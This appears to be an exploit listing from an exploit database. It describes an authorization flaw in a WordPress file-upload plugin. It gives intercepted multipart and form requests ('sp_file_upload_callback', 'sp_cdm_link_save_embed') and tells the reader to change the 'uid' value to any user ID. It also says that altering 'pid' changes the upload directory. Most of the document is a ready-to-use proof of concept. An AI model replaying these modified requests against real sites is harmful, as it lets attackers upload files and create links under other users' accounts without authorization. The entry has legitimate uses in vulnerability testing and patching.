## https://sploitus.com/exploit?id=WPEX-ID:01427CFB-5C51-4524-9B9D-E09A603BC34C
1. Select to upload a file through the plugin
2. Intercept the request:
Example:
```
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="file[]"; filename="IMG_0628.PNG"
Content-Type: image/png
...
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="action"
sp_file_upload_callback
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="uid"
2(CHANGE HERE)
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
```
Modify the `2(CHANGE HERE)` value and send the request.
Modify the next request body changing `2(CHANGE HERE)` to any user ID:
```
pid=2&action=sp_cdm_link_save_embed&uid=2(CHANGE HERE)&link-name=link1&link-url=http%3A%2F%2Flocalhost%3A8020%2Flink1&dlg-upload-notes=aaa
```
Note: the upload directory can also be manipulated by changing the `pid`